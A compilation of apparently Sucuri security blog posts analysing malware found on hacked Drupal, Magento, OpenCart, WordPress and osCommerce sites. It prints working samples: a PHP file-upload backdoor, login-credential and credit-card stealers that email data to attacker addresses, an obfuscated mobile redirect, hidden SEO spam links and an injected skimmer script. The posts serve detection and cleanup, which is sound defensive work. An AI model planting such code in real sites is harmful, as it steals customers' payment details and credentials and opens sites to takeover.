Category: Uncategorized

It’s very common to see backdoors such as uploaders among site’s files. However, we have seen more often cases where file uploaders, mainly in Drupal websites, are located in the database. Many anti-malware products won’t catch those since they usually look only the files and don’t check the database content. Below is an example of a file uploader found in an entry of an Drupal database:

<?php
echo '<title>Uploader</title>';
echo '<center><font color="#11f0f3"><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"></center>';
echo '<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></font><center>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<center><br><br><b><font color="#11f0f3">UPLOAD SUCCESS!</font></b></center><br><br>'; }
else { echo '<center><br><br><b><font color="#f31111">UPLOAD FAILED!</font></b></center><br><br>'; }
}
?>

The code above was embedded in a malicious post created by the attacker, as you can see in the following screenshot:

The code itself is simple as it just accepts a generic file upload and pushes to the root of the site. However, if the database is not properly inspected in your Drupal website, you can be reinfected even after a deep inspection of your files.

If your site is currently infected and you need help cleaning it up, let us know.

While analyzing a compromised Magento site, we found another Credit Card (CC) stealer variation. We posted a few times about this type of malware, but this one is a bit different in a way that it also steals the login credentials for the website users. All the ones we analyzed before never had such behaviour.

The malicious code was found inside the app/code/core/Mage/Admin/Model/Session.php file and emails to XXX@XXX.com every login and password:

class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
{
    ...skipped code...
    protected function testReview($username, $password, $email)
    {
        $to = 'removed@removed.dom';
        $subject = 'Webserver';
        $message = $username.'|'.$pssword.'|'.$email.'|'.$_SERVER['REQUEST_URI'];
        $headers = 'From: removed@removed.dom' . "\r\n" .
            'Reply-To: removed@removed.dom' . "\r\n" .
            'X-Mailer: PHP/' . phpversion();

        mail($to, $subject, $message, $headers);
    }
    ...skipped code...
    public function login($username, $password, $request = null) {
    ...skipped code...
    if ($user->getId()) {
                $this->testReview($username, $password, $user->getEmail());
                $this->renewSession();
                ...skipped code...
...skipped code...

This is the first time we see a malware on Magento that actually steals credentials alongside with credit card numbers. If you\'re using Magento as e-commerce solution, always check your core files for any modified content, and do regular scans. As always, if you need a professional service for your website, you can count on Sucuri.

We have previously analyzed many Credit Card stealers code, specially targeting the Magento platform:

• Magento Malware Emails Stolen Credit Card Details to Hackers
• Magento script stealing credit card details

However, this type of malicious code is not only being used against Magento, as we see if often on other ecommerce platforms. To give an example, we were analyzing a compromised OpenCart site and found the following entry on the file:

$smail=$order_info['order_id']."|".$order_info['payment_firstname']."|".$order_info['payment_lastname'].
"|".$order_info['payment_address_1']."|".$order_info['payment_city']."|"
.$order_info['payment_postcode']."|".$order_info['payment_zone']."
|".$order_info['payment_country']."|".$order_info['telephone']."|".$this->request->post['cc_expire_date_month'].
"|".$this->request->post['cc_expire_date_year']."|".$this->request->post['cc_cvv2']."|".$this->
request->post['cc_number'];
mail("swordsofnorthshirei@yopmail.com","infectedOpenCart",$smail,"From: infected@anotheropencartsite.dom\r\nReply-to: bademail@yopmail.com");

If you are not familiar with PHP, this code gets all credit card transaction data (including name, address, CVV, etc) and email to swordsofnorthshirei@yopmail.com. Yopmail(.)com is a domain that allows the use of disposable e-mail inboxes.

As you can see, ecommerce sites (and customers) have a lot more to lose when they get compromised as they process and deal with critical information from their users. Whenever possible, we recommend using 3rd party providers, like Stripe or Paypal to reduce your PCI scope and do not allow credit card data to pass through your site.

If you run OpenCart or any other ecommerce platform, check out our Sucuri Firewall to protect your site from attacks and compromises.

We recently found a website that was redirecting mobile users to a third-party site called chickenkiller&nbsp.com, after further investigation we found that the malware was actually injected into the database, the code was hex encoded to prevent users from being able to search for the domain in the malicious code.

The malware was stored in: wp_options -> FieldName: option_value -> ID: 3284 (this value may not be the same on every infection)

Here\'s a snippet of the code you may find on infected sites:

a:1:{s:7:"padding";s:1888:"</script><script>var _0x93d9=["\x77\x70\x6B\x6A","\x63\x6F\x6F\x6B\x69\x65","\x3D"
,"\x3B\x20\x70\x61\x74\x68\x3D\x2F","\x3B","\x73\x70\x6C\x69\x74","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67"
,"\x63\x68\x61\x72\x41\x74","\x20","\x69\x6E\x64\x65\x78\x4F\x66"];
if(!readCookie(_0x93d9[0])){createCookie(_0x93d9[0],_0x93d9[1],1);if(/iPhone|iPad|iPod/i[_0x93d9[1]]
(navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[4]}else {if(/Android/i[_0x93d9[1]](navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[5]}};};

This malware\'s obfuscation technique is not too complex, when deobfuscated, the most interesting part is the conditional redirect, which tells us that the malware had two different final URLs depending on which flavor of the mobile OS:

    if (!readCookie("wpkj") {
        createCookie("wpkj", "test", 1);
        if (/iPhone|iPad|iPod/i ["test"](navigator["userAgent"])) {
            window[location] = "http:// load-me.chickenkiller .com/5972"
        } else {
            if (/Android/i ["wpkj"](navigator["test"])) {
                window[location] = "http:// load-me.chickenkiller .com/596F"
            }
        };
    };

What we learn form this sample is that checking only your site\'s files for anomalies is not enough. Once an attack happens, the attacker can add malicious content to your site\'s database. It could be a backdoor or a malicious redirect for mobile phones.

In black hat SEO schemes, some links don't have to have descriptive anchor keywords. For example, if their only purpose is help search engine crawlers discover newly created doorways. But even in such cases, the links should be hidden from webmasters of the hacked sites where they are placed on.

Recently, our malware analyst 12 notified the labs about an increased number of cases of database spam infections where (mostly) pharma links were injected inside the legit blog posts. What's interesting about those infections is how hackers make the links invisible. In this case, they didn't add any invisible blocks, didn't add any additional text at all. They just made links out of some parts of existing blog content. Of course they realized that underlines and changing mouse would reveal that some words unexpectedly became clickable. To minimize the exposure, hackers 1). used the text-decoration:none style to get rid of underlines, 2). used the text parts with smallest footprints - periods at the end of sentences.

... some legitimate text<a style="text-decoration:none" href="/index.php?w=coversyl-online-bestellen-legal">.</a>

Such links are virtually invisible to human visitors and at the same time when search engines crawl the compromised sites, they discover links to spammy doorways (e.g http://infectedwebsite .com/index.php?w=coversyl-online-bestellen-legal in this particular case).

This trick is smart but it may only fool people who rely on visual web page inspection only. To security scanners like SiteCheck or Unmask Parasites such period-links are as visible as any other types of links so the infection gets easily detected.

To make malicious injections look less suspicious, hackers like to use domains that look credible. It may be some typo domain like google-analystisc[.]com instead of google-analytics.com, or correct domain names under a different TLDs, e.g.: ads.googleadservices[.]at or googleads.g.doubleclick[.]cn.com.

Sometimes they hide their scripts and iframes befind shortened URL. Other times they upload malicious content to public services like Pastebin.

This time we discovered a script injection that used site\'s alternative domain name provided by its host for free to their clients. In this case the malicious script was placed on a hacked site hosted on a Network Solutions\' server. So instead of using the real domain name, which could alert the webmaster of the hacked site when the domain gets blacklisted, hackers used its alternative 0055d7b.netsolhost[.]com address.

We found this code injected into multiple design/head/includes rows (different scopes) of the core_config_data table in the Magento database:

<script src="//0055d7b . netsolhost[.]com/Blog/lib2/js/js.js"> </script>

The script looks like coming from some Network Solutions CDN. However, it\'s a malicious script on a site where everything below /Blog was created by hackers (e.g. you can find a PHProxy script under Blog/lib2/ - the tool that hackers use to make anonymous requests to third-party sites, e.g. access backdoors). The js.js script itself adds extra handlers that intercept all data entered into all HTML forms on the infected Magento site and send them to a PHP script on the same Networks Solution server 0055d7b .netsolhost[.]com/Blog/lib2/js/main.php. Technically, the script is used to steal credit card and other sensitive payment details from order forms on e-commerce sites (although it can be used to steal credentials from login forms too).

Don\'t trust third-party content just because it uses a reputable domain name. Always doublecheck everything that you don\'t recognize or don\'t believe should be on your site. Test your database and files on server for integrity, and monitor your site for security issues.

We regularly detect malware that targets payment modules on compromised ecommerce websites, mainly on Magento.

Recently we’ve stumbled upon the same threat on osCommerce. The malicious code was found inside ./catalog/checkout_confirmation.php and used obfuscation as below:

…eval(gzinflate(str_rot13(base64_decode('Dc9UsqJAAADQ43x/sRAQFHdJ5ByUBoTNRxMaVg0i0dPPvBu8ZYXdqfrWGGhjLkIZ/JRK5mJE5lBEnn5Dd7qA3zbFyNbzI47VvBPpQ…wSmhNUk33O2C+uFKeOUAGdb8UyETzPEp1nvg7hIgQB5355jGg9LQuJGxB31rYoBLc7LHDv0hwC8L3ocO4KlLduNn6ntts7EmJ1z1lZuZ4tFt4U12paYTRI+dIKnefP7+/vn38='))));…

When decoded, the code appeared to be a credit card stealer. The code sends a copy of stolen credit card information to attacker’s email and saves it inside an image file for backup purposes. This happens every time customers submit their payment details during the checkout process:

$recipient = "<attacker’s-email-address>@gmail.com";$subject = "www.<compromised-site>.com";$mailheaders = "From: www.<compromised-site>.com <sales@ www.<compromised-site>.com >";$address4 = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', '<br>');$ip = getenv("REMOTE_ADDR");…$message .= "Name on card: ".$_POST['cc_owner']." CC: ".$_POST['cc_number']." Exp: ".$_POST['cc_expires_month']         ."/".$_POST['cc_expires_year']." CVV2: ".$_POST['cc_ccv']."n";…mail($recipient, $subject, $message, $mailheaders);$f = fopen('/<path to public directory>/catalog/images/oscommerce2.gif','a');fputs($f, $message . "n"); fclose($f);

If you're using osCommerce as ecommerce solution, always check your core files, especially ./catalog/checkout_confirmation.php for any modified content, and do regular scans. As always, if you need a professional service for your osCommerce website, you can count on our Website AntiVirus service.